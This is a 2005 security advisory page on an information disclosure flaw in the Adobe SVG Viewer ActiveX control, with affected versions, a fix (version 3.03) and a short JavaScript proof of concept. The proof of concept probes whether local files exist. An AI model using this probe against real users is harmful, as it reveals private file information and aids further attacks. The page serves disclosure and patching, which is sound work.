Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability

BID:13490

Info

Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability

Bugtraq ID: 13490
Class: Design Error
CVE:
Remote: Yes
Local: No
Published: May 04 2005 12:00AM
Updated: May 04 2005 12:00AM
Credit: Discovered by Robert Fly <[email protected]>.
Vulnerable: Adobe SVG Viewer 3.0 2
Adobe SVG Viewer 3.0 1
Adobe SVG Viewer 3.0
Not Vulnerable: Adobe SVG Viewer 3.0 3

Discussion

Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability

The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file.

Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.

This vulnerability affects Adobe SVG Viewer version 3.02 and earlier.

Exploit / POC

Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability

The following proof of concept is available:

Sample Javascript:
function load(filename)
{
//foo is reference to SVG ActiveX control, filename is the filename
you're looking for
foo.src = filename;
setTimeout("loading()", 5000);
}

function loading()
{
if (document.readyState != 'complete')
{
alert('File does not exist.');
}
else
{
alert('File exists.');
}
window.location.reload(false);
}

Solution / Fix

Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability

Solution:
This issue has been addressed in Adobe SVG Viewer 3.03.


Adobe SVG Viewer 3.0 1

Adobe SVG Viewer 3.0 2

Adobe SVG Viewer 3.0

References

Adobe SVG Viewer ActiveX Control SRC Information Disclosure Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report